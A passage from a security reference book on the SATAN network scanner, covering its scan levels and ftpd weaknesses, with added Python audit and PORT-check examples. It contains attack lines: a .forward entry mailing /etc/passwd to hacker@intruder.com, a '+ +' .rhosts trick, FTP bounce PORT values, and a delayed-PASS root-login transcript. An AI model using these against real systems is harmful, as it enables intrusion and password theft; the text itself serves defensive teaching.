Internet Security Professional Reference:SATAN and the Internet

Normal Scans

The normal scan does everything included in the light scan and adds scans of fingerd, various TCP services, and UDP services. Depending on the results, and the rules database, it optionally scans rusers, bootparam, and yp.

If the target is m2.notreal.com, the finger scan tries to finger -l the following: @m2.notreal.com, 0@m2.notreal.com, @@m2.notreal.com, root@m2.notreal.com, demo@m2.notreal.com, and guest@m2.notreal.com.

Next, SATAN does a TCP scan to see whether services are actively listening on ports for gopher, http, FTP, telnet, smtp, nntp, uucp, and X. SATAN then scans UDP ports for DNS and xdmcp.

If the portmap program reports that rusersd is available, SATAN then contacts rusersd and reports what users are logged in to the target and from what systems.

SATAN now tries to contact the rpc bootparam service to get the NIS domain name. It uses a list of client names based on hosts that show up in the NFS exports list from mountd.

If SATAN gets the domain name, it then runs a yp-chk program to try to get the passwd.byname map from the NIS server.

Heavy Scans

The heavy scan includes everything from the light and normal scans and adds a much larger search for active services. The TCP scan runs from port 1 to port 9999. (A comment in satan.cf indicates that a very heavy scan might want to run to 65535 instead of 9999.) The UDP scan runs from 1 to 2050 and from 32767 to 33500.

Finally, a heavy scan checks the remaining rules to see if any of the .satan scripts need to be run, based on the results of the previous port scans. For example, the ftp and rsh scripts are executed if these services are available.

Vulnerabilities that SATAN Investigates

SATAN includes checks for a number of common security vulnerabilities.

ftpd

SATAN checks whether the remote host offers anonymous FTP access. If it does, it checks whether the ~ftp directory is writable by the anonymous user. SATAN also checks the ftpd banner line to see whether it is an old version of wu-ftpd.

The SATAN documentation explains how these checks correlate to known vulnerabilities. The documentation also gives an example of another security hole in ftpd—the possibility of a delayed PASS statement—but it does not actively look for this hole. The documentation also mentions that the ~ftp/etc/passwd file is a useful item, but SATAN does not attempt to retrieve this.

Take a minute to investigate each of these ftpd issues. First, the presence of anonymous FTP is not a security hole in itself. It does provide you with access to the remote system, which can enable you to probe for other holes.

A hacker with access to the ftp directory can upload a .rhosts file, perhaps containing + +, to permit access from any remote system. The hacker can then rlogin to the system using the FTP login account and gain access without typing a password. This can be prevented by specifying a shell of /bin/false in the /etc/passwd entry for FTP.

A hacker could upload a .forward file containing a command, such as |/bin/mail hacker@intruder.com < /etc/passwd, into the ~ftp directory. The hacker would just mail a message to FTP at the target site, causing the mail to be forwarded, as instructed, to the program that gets executed. The hacker can then use Crack to attack the passwords on the system.

SATAN does not look for writable ~ftp/etc or ~ftp/bin directories, although it probably should. A system using ftpd with sublogins depends on ~ftp/etc/passwd to grant access to users. If an anonymous user can modify this file, that user can gain access to subdirectories containing files from other users. Similarly, modification of utilities such as bin/ls or bin/sh can give the intruder an opportunity for attacks.

For example, imagine that the ~ftp/bin/ls command were modified to fake a reason for a new password prompt. Some unsuspecting users might retype their password at this bogus prompt, and the modified ls could store this information. Because many ~ftp/etc/passwd files contain the same information as /etc/passwd, this could give the hacker a real login.

The wu-ftpd program had two vulnerabilities, CERT CA-93:06 and CA-94:07, that permitted remote users to gain access to the system. First, a race condition in the code permitted users to log in as root. Second, the SITE EXEC command permitted users to execute commands as root. Both of these problems have been fixed in recent versions of wu-ftpd.

The presence of a ~ftp/etc/passwd file with encrypted fields is another potential security hole. As mentioned earlier, the ~ftp/etc/passwd file is mainly used to map file uids to login names for directory listings, a service for which encrypted fields are not needed; they can be disabled by replacing them with an *. For those ftp daemons that use sublogins, the encrypted fields are used for authentication.

However, these fields do not have to correspond to the /etc/passwd fields. Users should be required to have different passwords for anonymous sublogins and normal system logins. This is because a hacker will immediately run Crack against the ~ftp/etc/passwd file entries. SATAN does not get the ~ftp/etc/passwd file.
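The ~ftp checks described above (writable ~ftp, ~ftp/etc and ~ftp/bin, replaceable bin utilities, and live hash fields in ~ftp/etc/passwd) as a local audit script, added here as an example; it is not SATAN's code and not from the book. It assumes the ~ftp tree is root-owned, so only the group and other write bits matter, and it builds a constructed sample tree so it runs offline.

```python
import os
import shutil
import stat
import tempfile

WRITE_BITS = stat.S_IWGRP | stat.S_IWOTH  # assumption: tree is root-owned, so only these bits reach the ftp user


def audit_ftp_root(root):
    """Findings: writable ~ftp, etc or bin, writable bin utilities, live hashes."""
    findings = []
    for sub in ("", "etc", "bin"):  # ~ftp itself, then the etc and bin subdirectories
        path = os.path.join(root, sub)
        if os.path.isdir(path) and os.stat(path).st_mode & WRITE_BITS:
            findings.append("writable: " + (sub or "~ftp"))
    bindir = os.path.join(root, "bin")  # ls, sh, ... must not be replaceable either
    if os.path.isdir(bindir):
        for name in sorted(os.listdir(bindir)):
            if os.stat(os.path.join(bindir, name)).st_mode & WRITE_BITS:
                findings.append("writable: bin/" + name)
    passwd = os.path.join(root, "etc", "passwd")  # should only map uids to names
    if os.path.isfile(passwd):
        with open(passwd) as f:
            for line in f:
                fields = line.split(":")
                if len(fields) >= 2 and fields[1] not in ("*", "x", "!", ""):
                    findings.append("hash present: " + fields[0])
    return findings


def make_sample_ftp_root():
    """Constructed sample tree: world-writable etc and a fake live hash for alice."""
    root = tempfile.mkdtemp(prefix="ftproot-")
    for sub in ("etc", "bin"):
        os.mkdir(os.path.join(root, sub))
    with open(os.path.join(root, "bin", "ls"), "w") as f:
        f.write("#!/bin/sh\n")
    with open(os.path.join(root, "etc", "passwd"), "w") as f:
        f.write("ftp:*:14:50:Anonymous FTP:/:/bin/false\n")
        f.write("alice:FAKEHASHxyz:1001:100:Alice:/home/alice:/bin/sh\n")
    os.chmod(os.path.join(root, "bin", "ls"), 0o755)
    for sub, mode in (("", 0o755), ("etc", 0o777), ("bin", 0o755)):
        os.chmod(os.path.join(root, sub), mode)  # etc is deliberately weak
    return root


def run_demo():
    root = make_sample_ftp_root()
    try:
        return audit_ftp_root(root)  # -> ['writable: etc', 'hash present: alice']
    finally:
        shutil.rmtree(root)
```

Point audit_ftp_root() at the real ~ftp directory to audit a host; run_demo() only exercises the constructed sample.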

The previously mentioned ftpd server bounce problem is also not probed by SATAN. This problem could be checked by trying a PORT command with an IP address different from the originating source, or with a privileged TCP port number on the originating source. For example, if the hacker used FTP from a system with IP address 1.2.3.4, the hacker would specify PORT 1,2,3,4,0,25 to spoof e-mail onto his or her own system, or PORT 2,3,4,5,0,21 to spoof the IP address to the FTP port of the system at IP address 2.3.4.5. A fixed ftpd would not permit either action.
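The two checks a fixed ftpd applies to PORT (data address must be the control connection's peer, and the port must not be privileged), as an added example in Python; it is not code from the book or from any ftpd, and the function names and the (allowed, reason) return shape are this example's own.

```python
import ipaddress

PRIVILEGED_PORT_MAX = 1023  # ports 1-1023 are reserved for system services


def parse_port_args(arg):
    """Parse the h1,h2,h3,h4,p1,p2 argument of an FTP PORT command."""
    parts = arg.split(",")
    if len(parts) != 6:
        raise ValueError("PORT needs six comma-separated numbers")
    nums = []
    for part in parts:
        if not part.isdigit() or int(part) > 255:
            raise ValueError("PORT field must be 0-255")
        nums.append(int(part))
    host = ".".join(str(n) for n in nums[:4])
    port = nums[4] * 256 + nums[5]
    return host, port


def port_command_allowed(arg, control_peer_ip):
    """Apply the checks a fixed ftpd makes before opening the data connection:
    the address must be the control connection's peer and the port must not be
    privileged. Returns (allowed, reason)."""
    try:
        host, port = parse_port_args(arg)
    except ValueError as exc:
        return False, "malformed: " + str(exc)
    if ipaddress.ip_address(host) != ipaddress.ip_address(control_peer_ip):
        return False, "address does not match control connection"
    if port <= PRIVILEGED_PORT_MAX:
        return False, "privileged port %d" % port
    return True, "ok"


if __name__ == "__main__":
    # The two bounce attempts from the text, plus an ordinary high port.
    for arg in ("1,2,3,4,0,25", "2,3,4,5,0,21", "1,2,3,4,4,1"):
        print(arg, port_command_allowed(arg, "1.2.3.4"))
```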

The delayed PASS command problem is documented in the SATAN white paper but is not investigated by SATAN because it represents a more active intrusion rather than a passive probe. As mentioned in the white paper, a remote user could gain root access by embedding a CWD command between the USER and PASS commands. For example, consider this exchange:

% ftp
ftp> open notreal.com
Connected to notreal.com
220 notreal.com FTP server ready.
ftp> quote user ftp
331 Guest login ok, send ident as password
ftp> quote cwd ~root
530 Please login with USER and PASS
ftp> quote pass ftp
230 Guest login ok, access restrictions apply.
